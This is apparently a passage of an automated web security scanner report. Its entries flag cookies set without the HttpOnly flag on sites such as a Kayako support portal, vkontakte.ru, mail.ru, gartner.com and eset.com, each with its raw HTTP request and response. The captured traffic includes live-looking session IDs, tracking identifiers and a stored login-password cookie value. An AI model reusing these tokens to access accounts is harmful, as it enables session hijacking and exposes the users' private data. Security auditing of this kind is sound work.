Host:   https://support.trust-guard.com
Path:   /index.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

POST /index.php HTTP/1.1
Referer: https://support.trust-guard.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: support.trust-guard.com
Cookie: SWIFT_sessionid40=8n54ogf9yeyrzjhmjwv9umkqinwempoj; SWIFT_client=a%3A1%3A%7Bs%3A7%3A%22groupid%22%3Bs%3A1%3A%221%22%3B%7D; SWIFT_visitor=a%3A1%3A%7Bs%3A8%3A%22isbanned%22%3Bs%3A1%3A%220%22%3B%7D
Expect: 100-continue
Accept-Encoding: gzip, deflate
Content-Length: 84

_a=login&_m=core&loginemail=&loginpassword=&querystring=&rememberme=1&Submit2=Log+in

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 18:59:16 GMT
Server: Apache/1.3.41 Ben-SSL/1.59
X-Powered-By: PHP/5.2.17
Set-Cookie: SWIFT_loginemail=deleted; expires=Sun, 25-Apr-2010 18:59:16 GMT; path=/
Set-Cookie: SWIFT_loginpassword=deleted; expires=Sun, 25-Apr-2010 18:59:16 GMT; path=/
Set-Cookie: SWIFT_loginemail=deleted; expires=Sun, 25-Apr-2010 18:59:16 GMT; path=/
Set-Cookie: SWIFT_loginpassword=DErwC5IL14LhnSqA7IFm011b3Yjo0HD7Sizs0xht1wo%3D; expires=Tue, 24-Apr-2012 18:59:16 GMT; path=/
Content-Type: text/html
Content-Length: 929

<html>
<head>
<title></title>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<meta http-equiv="Refresh" content="1; URL=index.php?loginresult=-5&amp;group=default">

<!-- default
...[SNIP]...
17.203. https://support.trust-guard.com/visitor/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.trust-guard.com
Path:   /visitor/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /visitor/ HTTP/1.1
Referer: https://support.trust-guard.com/visitor/index.php?_m=livesupport&_a=htmlcode&departmentid=0&fullname=&email=
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: support.trust-guard.com
Cookie: SWIFT_sessionid40=8n54ogf9yeyrzjhmjwv9umkqinwempoj; SWIFT_client=a%3A1%3A%7Bs%3A7%3A%22groupid%22%3Bs%3A1%3A%221%22%3B%7D
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 18:59:13 GMT
Server: Apache/1.3.41 Ben-SSL/1.59
X-Powered-By: PHP/5.2.17
Set-Cookie: SWIFT_visitor=a%3A1%3A%7Bs%3A8%3A%22isbanned%22%3Bs%3A1%3A%220%22%3B%7D; path=/
Content-Type: text/html
Content-Length: 0

17.204. http://t2.trackalyzer.com/trackalyze.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://t2.trackalyzer.com
Path:   /trackalyze.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /trackalyze.asp?r=None&p=http%3A//www.criticalwatch.com/vulnerability-management.aspx&i=12408 HTTP/1.1
Host: t2.trackalyzer.com
Proxy-Connection: keep-alive
Referer: http://www.criticalwatch.com/vulnerability-management.aspx
Cache-Control: max-age=0
If-Modified-Since: Thu, 09 Nov 2006 20:55:11 GMT
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
If-None-Match: "6e791f59414c71:40e"
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: trackalyzer=241848410610538; loop=http%3A%2F%2Fwww%2Ecriticalwatch%2Ecom%2Fvulnerability%2Dmanagement%2Easpx; ASPSESSIONIDSATDRRCT=HPHILLICKDBELBOMJPJGMDEB

Response

HTTP/1.1 302 Object moved
Date: Mon, 25 Apr 2011 12:52:31 GMT
Server: Microsoft-IIS/6.0
P3P: policyref="http://trackalyzer.com/w3c/p3p.xml", CP="NON DSP COR CURa OUR NOR"
Location: http://t2.trackalyzer.com/dot.gif
Content-Length: 154
Content-Type: text/html
Set-Cookie: loop=http%3A%2F%2Fwww%2Ecriticalwatch%2Ecom%2Fvulnerability%2Dmanagement%2Easpx; expires=Tue, 26-Apr-2011 07:00:00 GMT; path=/
Cache-control: private

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="http://t2.trackalyzer.com/dot.gif">here</a>.</body>
17.205. http://top5.mail.ru/counter  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://top5.mail.ru
Path:   /counter

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /counter?id=110605;js=13;r=;j=true;s=1920*1200;d=16;rand=0.07091198652051389 HTTP/1.1
Host: top5.mail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoFACDL8gAAdDQMfV4MAQAIEwAIeWwM

Response

HTTP/1.1 200 OK
Server: wz/1.4
Date: Mon, 25 Apr 2011 14:48:03 GMT
Content-Type: image/gif
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR PSA OUR NOR"
Set-Cookie: VID=2VWb1Y31X_ms; path=/; expires=Tue, 26 Jul 2011 14:48:03 GMT; domain=.mail.ru
Set-Cookie: FTID=0; path=/; max-age=0; expires=Thu, 01 Jan 1970 00:00:01 GMT; domain=.mail.ru
Cache-control: no-store, no-cache, must-revalidate
Pragma: no-cache
Content-Length: 43
Connection: close

GIF89a.............!.......,...........D..;
17.206. http://translate.googleapis.com/translate_a/t  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://translate.googleapis.com
Path:   /translate_a/t

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /translate_a/t?anno=3&client=te_lib&format=html&v=1.0 HTTP/1.1
Host: translate.googleapis.com
Proxy-Connection: keep-alive
Referer: http://webalta.ru/
Origin: http://webalta.ru
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Content-Length: 4036

q=%3Ca%20i%3D0%3E%D0%9F%D0%BE%D0%B8%D1%81%D0%BA%3C%2Fa%3E%3Ca%20i%3D1%3E%D0%9D%D0%BE%D0%B2%D0%BE%D1%81%D1%82%D0%B8%3C%2Fa%3E%3Ca%20i%3D2%3E%D0%90%D0%B2%D1%82%D0%BE%3C%2Fa%3E%3Ca%20i%3D3%3E%D0%9A%D0%B8
...[SNIP]...

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 14:48:55 GMT
Expires: Mon, 25 Apr 2011 14:48:55 GMT
Cache-Control: private, max-age=600
Pragma: no-cache
Access-Control-Allow-Origin: *
Content-Type: text/javascript; charset=UTF-8
Content-Language: en
Set-Cookie: PREF=ID=5273502baf452368:TM=1303742935:LM=1303742935:S=EXx_U-Oas8EoHHIY; expires=Wed, 24-Apr-2013 14:48:55 GMT; path=/; domain=translate.googleapis.com
X-Content-Type-Options: nosniff
Server: translation
X-XSS-Protection: 1; mode=block
Content-Length: 1713

["\x3ca i=0\x3eSearch\x3c/a\x3e \x3ca i=1\x3eNews\x3c/a\x3e \x3ca i=2\x3eAuto\x3c/a\x3e \x3ca i=3\x3eMovies\x3c/a\x3e \x3ca i=4\x3eWeather\x3c/a\x3e \x3ca i=5\x3eGames\x3c/a\x3e","My Page","All Ads","
...[SNIP]...
17.207. http://vkontakte.ru/login.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://vkontakte.ru
Path:   /login.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /login.php?act=slogin&al_frame=1&auto=1 HTTP/1.1
Host: vkontakte.ru
Proxy-Connection: keep-alive
Referer: http://vkontakte.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: remixchk=5

Response

HTTP/1.1 200 OK
Server: nginx/0.7.59
Date: Mon, 25 Apr 2011 14:24:44 GMT
Content-Type: text/html; charset=windows-1251
Connection: keep-alive
X-Powered-By: PHP/5.2.6-1+lenny10
Pragma: no-cache
Cache-control: no-store
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: remixmid=deleted; expires=Sun, 25-Apr-2010 14:24:43 GMT; path=/; domain=.vkontakte.ru
Set-Cookie: remixsid=deleted; expires=Sun, 25-Apr-2010 14:24:43 GMT; path=/; domain=.vkontakte.ru
Set-Cookie: remixgid=deleted; expires=Sun, 25-Apr-2010 14:24:43 GMT; path=/; domain=.vkontakte.ru
Set-Cookie: remixemail=deleted; expires=Sun, 25-Apr-2010 14:24:43 GMT; path=/; domain=.vkontakte.ru
Set-Cookie: remixpass=deleted; expires=Sun, 25-Apr-2010 14:24:43 GMT; path=/; domain=.vkontakte.ru
Vary: Accept-Encoding
Content-Length: 540

<script type="text/javascript">
var _ua = navigator.userAgent;
var locDomain = 'vkontakte.ru'.match(/[a-zA-Z]+\.[a-zA-Z]+\.?$/)[0];
if (/opera/i.test(_ua) || !/msie 6/i.test(_ua) || document.domain !=
...[SNIP]...
17.208. http://wtssdc.gartner.com/dcs2kf7dq10000sddxi7bvt9i_6o7e/dcs.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://wtssdc.gartner.com
Path:   /dcs2kf7dq10000sddxi7bvt9i_6o7e/dcs.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /dcs2kf7dq10000sddxi7bvt9i_6o7e/dcs.gif?&dcsdat=1303733460071&dcssip=www.gartner.com&dcsuri=/DisplayDocument&dcsqry=%3Fdoc_cd=127481&WT.seg_2=000000-00&WT.tz=-5&WT.bh=7&WT.ul=en-US&WT.cd=16&WT.sr=1920x1200&WT.jo=Yes&WT.ti=Improve%20IT%20Security%20With%20Vulnerability%20Management&WT.js=Yes&WT.jv=1.5&WT.bs=1034x978&WT.fi=Yes&WT.fv=10.2&WT.cg_n=Document%20Display&WT.pn_sku=480703&WT.vt_f_tlh=1303732853&WT.vt_sid=173.193.214.243-1722167968.30147392.1303732853510&WT.co_f=173.193.214.243-1722167968.30147392&WTclass=FullFree&WTdoc_cd-title=127481:Improve%20IT%20Security%20With%20Vulnerability%20Management&WTdocrole=IT%20Infrastructure%20%26%20Operations;%20Security%20%26%20Risk%20Management;%20Enterprise%20Architecture;%20Application%20Management HTTP/1.1
Host: wtssdc.gartner.com
Proxy-Connection: keep-alive
Referer: http://www.gartner.com/DisplayDocument?doc_cd=127481
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WEBTRENDS_ID=173.193.214.243-1722327968.30147392; WebLogicSession=cSYnN1vJnb1Nx84rkvK9h3y2Z1JSqHc4Q7GnchMG2ZDySdxm2Pns!475228577; ACOOKIE=C8ctADE3My4xOTMuMjE0LjI0My0xNzIyMzI3OTY4LjMwMTQ3MzkyAAAAAAABAAAAAQAAAGpitU1qYrVNAQAAAAEAAABqYrVNamK1TQAAAAA-; WT_FPC=id=173.193.214.243-1722167968.30147392:lv=1303733460073:ss=1303732853510

Response

HTTP/1.1 200 OK
Content-Length: 43
Content-Type: image/gif
Last-Modified: Fri, 10 Mar 2006 19:37:06 GMT
Accept-Ranges: bytes
ETag: "09d6037a44c61:b1d"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: ACOOKIE=C8ctADE3My4xOTMuMjE0LjI0My0xNzIyMzI3OTY4LjMwMTQ3MzkyAAAAAAABAAAAAQAAAMhktU1qYrVNAQAAAAEAAADIZLVNamK1TQEAAAABAAAAIzE3My4xOTMuMjE0LjI0My0xNzIyMzI3OTY4LjMwMTQ3Mzky; path=/; expires=Thu, 22-Apr-2021 12:10:48 GMT
P3P: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Date: Mon, 25 Apr 2011 12:10:48 GMT
Connection: close

GIF89a.............!.......,...........D..;
17.209. http://www.dmca.com/Protection/Status.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dmca.com
Path:   /Protection/Status.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Protection/Status.aspx?id=6d6905a9-aeec-4426-921a-33dc8d0cdfb9&PAGE_ID=aHR0cDovL3d3dy5yZXB1dGF0aW9uY2hhbmdlci5jb20vc2NoZWR1bGVkLmh0bWw1 HTTP/1.1
Host: www.dmca.com
Proxy-Connection: keep-alive
Referer: http://www.reputationchanger.com/scheduled.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=wubflym5pb53bt45ku4n3oa4

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: whoson=521479-61577.4253039; expires=Thu, 23-Jun-2011 23:00:00 GMT; path=/
X-Powered-By: ASP.NET
Date: Mon, 25 Apr 2011 16:06:17 GMT
Content-Length: 14244


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" >
<html xmlns="http://www.w3.org/1999/xhtml">

<head id="ctl00_mstrHead"><title>
   Reputation Changer | Protected by DMCA Protecti
...[SNIP]...
17.210. http://www.eset.com/us/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.eset.com
Path:   /us/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /us/ HTTP/1.1
Host: www.eset.com
Proxy-Connection: keep-alive
Referer: http://shopping.netsuite.com/s.nl?sc=3&c=438708&n=1&ext=T
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: tnt=3; PHPSESSID=gnk9ss0g8a1obr4q9krd85j9a6; __utmz=1.1303735979.2.2.utmgclid=CLzn0qLPt6gCFQl_5Qod4S-RCA|utmccn=(not%20set)|utmcmd=(not%20set); mbox=PC#1303736347554-914602.17#1304952755|check#true#1303743215|session#1303743154006-383984#1303745015; __utma=1.1646584456.1303732844.1303735979.1303743158.3; __utmc=1; __utmb=1.1.10.1303743158; s_pers=%20s_cpmcvp%3D%255B%255B%2527KNC-g-nbag%2527%252C%25271303732844076%2527%255D%255D%7C1461585644076%3B%20s_vnum%3D1335268844052%2526vn%253D3%7C1335268844052%3B%20s_visit%3D1%7C1303744959492%3B%20gpv_pageName%3Dus/new_homepage%7C1303744959494%3B%20s_nr%3D1303743159496-Repeat%7C1335279159496%3B%20s_invisit%3Dtrue%7C1303744959497%3B; s_sess=%20s_cpc%3D0%3B%20s_campaign%3DKNC-g-nbag%3B%20s_cm%3DundefinedKNC-g-nbagundefined%3B%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: tnt=deleted; expires=Sun, 25-Apr-2010 15:16:46 GMT
Set-Cookie: tnt=3; expires=Fri, 24-Jun-2011 15:16:47 GMT
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 26704
Date: Mon, 25 Apr 2011 15:16:47 GMT
X-Varnish: 555652739
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>E
...[SNIP]...
17.211. https://www.fusionvm.com/FusionVM/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.fusionvm.com
Path:   /FusionVM/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /FusionVM/ HTTP/1.1
Host: www.fusionvm.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDQQQASDQQ=MNOLHEFCGKBHGOHLANCBPEKB

Response

HTTP/1.1 302 Found
Cache-Control: private
Content-Type: text/html; charset=utf-8
Location: https://www.fusionvm.com/FusionVM/DesktopDefault.aspx
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Set-Cookie: CriticalWatch_WinMgmt=a623626d-8fc7-42a5-b103-e9b75ad79594; expires=Mon, 25-Apr-2011 13:19:53 GMT; path=/
Set-Cookie: ASP.NET_SessionId=z4su31o2100elwiksplqkftw; path=/; HttpOnly
Date: Mon, 25 Apr 2011 12:54:52 GMT
Content-Length: 170

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="https://www.fusionvm.com/FusionVM/DesktopDefault.aspx">here</a>.</h2>
</body></html>
17.212. http://www.gartner.com/0_admin/css/documentdisplay.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.gartner.com
Path:   /0_admin/css/documentdisplay.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /0_admin/css/documentdisplay.css;pvc271f234619de471 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.gartner.com

Response

HTTP/1.1 200 OK
Content-type: text/css
Last-modified: Fri, 25 Feb 2011 23:13:43 GMT
ETag: "pvc271f234619de471c86331d0781b0d8c"
Expires: Sat, 15 Oct 2011 01:46:25 GMT
Cache-Control: public, s-maxage=7200, max-age=15724800
X-PvInfo: [S11101.C10821.A151050.RA0.G24F27.U45C73E2A].[OT/all.OG/includes]
Vary: Accept-Encoding
Accept-Ranges: bytes
Connection: Keep-Alive
Date: Mon, 25 Apr 2011 12:11:15 GMT
Age: 1593
Set-Cookie: TS83f541=f05c972c9edfede56a32664676fbba226bee90621e4ceb474db564e2; Path=/
Content-Length: 11084

/* TAG STYLES */
a {
color:#308ACF;
text-decoration: none;
}
a:hover {
text-decoration: underline;
}
ul {
list-style:disc;
}
body {
font-family: Verdana, Geneva, Arial, Helv
...[SNIP]...
17.213. http://www.gartner.com/0_admin/css/docverterNGRA.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.gartner.com
Path:   /0_admin/css/docverterNGRA.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /0_admin/css/docverterNGRA.css;pv5baab6279b42fad0 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.gartner.com

Response

HTTP/1.1 200 OK
Content-type: text/css
Last-modified: Fri, 25 Feb 2011 23:13:44 GMT
ETag: "pv5baab6279b42fad0267d731fc0b91143"
Expires: Sat, 15 Oct 2011 01:46:25 GMT
Cache-Control: public, s-maxage=7200, max-age=15724800
X-PvInfo: [S11101.C10821.A151050.RA0.G24F27.U837B2039].[OT/all.OG/includes]
Vary: Accept-Encoding
Accept-Ranges: bytes
Connection: Keep-Alive
Date: Mon, 25 Apr 2011 12:11:16 GMT
Age: 1594
Set-Cookie: TS83f541=6b2da585a63dda664aed29accddacf18a0a6c3165b9afd464db564e3; Path=/
Content-Length: 10459

/* stylesheet extracted from owner.html (originally update.html) */

.dv_tableTextIndent1 {
font-family: Verdana, Geneva, Arial, Helvetica, sans-serif;
font-size: 75%;
font-style: normal
...[SNIP]...
17.214. http://www.gartner.com/0_admin/images/documentdisplay/blue_gt_bullet.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.gartner.com
Path:   /0_admin/images/documentdisplay/blue_gt_bullet.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /0_admin/images/documentdisplay/blue_gt_bullet.gif;pvfba64ef8951859f0 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.gartner.com

Response

HTTP/1.1 200 OK
Content-type: image/gif
Last-modified: Fri, 25 Feb 2011 23:13:43 GMT
ETag: "pvfba64ef8951859f02fde94375233778f"
Expires: Wed, 19 Oct 2011 00:02:34 GMT
Cache-Control: public, s-maxage=7200, max-age=15724800
X-PvInfo: [S11101.C10821.A151075.RA0.G24F27.U3CEF9F60].[OT/images.OG/images]
Accept-Ranges: bytes
Connection: Keep-Alive
Date: Mon, 25 Apr 2011 12:11:19 GMT
Age: 6798
Content-Length: 53
Set-Cookie: TS83f541=aba30e374a2f00546378de7d4c8c3d19fd2bfd7686808ebd4db564e7; Path=/

GIF89a
......0.....!.......,....
.........y...|MV...;
17.215. http://www.gartner.com/0_admin/images/documentdisplay/blue_v_bullet.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.gartner.com
Path:   /0_admin/images/documentdisplay/blue_v_bullet.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /0_admin/images/documentdisplay/blue_v_bullet.gif;pvf70f576bef1d3ed9 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.gartner.com

Response

HTTP/1.1 200 OK
Content-type: image/gif
Last-modified: Fri, 25 Feb 2011 23:13:42 GMT
ETag: "pvf70f576bef1d3ed914b4c704f3d7d488"
Expires: Sat, 15 Oct 2011 01:48:24 GMT
Cache-Control: public, s-maxage=7200, max-age=15724800
X-PvInfo: [S11101.C10821.A151075.RA0.G24F27.UA511F917].[OT/images.OG/images]
Accept-Ranges: bytes
Connection: Keep-Alive
Date: Mon, 25 Apr 2011 12:11:19 GMT
Age: 6519
Content-Length: 54
Set-Cookie: TS83f541=f92d843d05fbcc91242d73f86afd887b35a0406515b877a04db564e7; Path=/

GIF89a
......0.....!.......,....
...........B.M.jm..;
17.216. http://www.gartner.com/0_admin/images/documentdisplay/dl_pdf.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.gartner.com
Path:   /0_admin/images/documentdisplay/dl_pdf.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /0_admin/images/documentdisplay/dl_pdf.gif;pv645290f3cec6f422 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.gartner.com

Response

HTTP/1.1 200 OK
Content-type: image/gif
Last-modified: Fri, 25 Feb 2011 23:13:43 GMT
ETag: "pv645290f3cec6f4224870b721aa89cdc0"
Expires: Sat, 15 Oct 2011 01:59:12 GMT
Cache-Control: public, s-maxage=7200, max-age=15724800
X-PvInfo: [S11101.C10821.A151075.RA0.G24F27.UE046FD5E].[OT/images.OG/images]
Accept-Ranges: bytes
Connection: Keep-Alive
Date: Mon, 25 Apr 2011 12:11:19 GMT
Age: 3681
Content-Length: 167
Set-Cookie: TS83f541=0368e5dfa99e4c7c60288dc0b1bfc0e6c6ad2c65177a6bb94db564e7; Path=/

GIF89a-......333fff......!.......,....-.....x........a....fzYm.hu...*f..
........N...8.x..h9..H..2....e.*.;A.FI...;(pz....-(.K...QN./.H..yoGT...F..WH...h.....@YiY..;
17.217. http://www.gartner.com/0_admin/images/documentdisplay/gartner_logo.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.gartner.com
Path:   /0_admin/images/documentdisplay/gartner_logo.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /0_admin/images/documentdisplay/gartner_logo.gif;pv0fa3dd26dbfd16cf HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.gartner.com

Response

HTTP/1.1 200 OK
Content-type: image/gif
Last-modified: Fri, 25 Feb 2011 23:13:42 GMT
ETag: "pv0fa3dd26dbfd16cf7bf6517dac53138e"
Expires: Sat, 15 Oct 2011 01:48:24 GMT
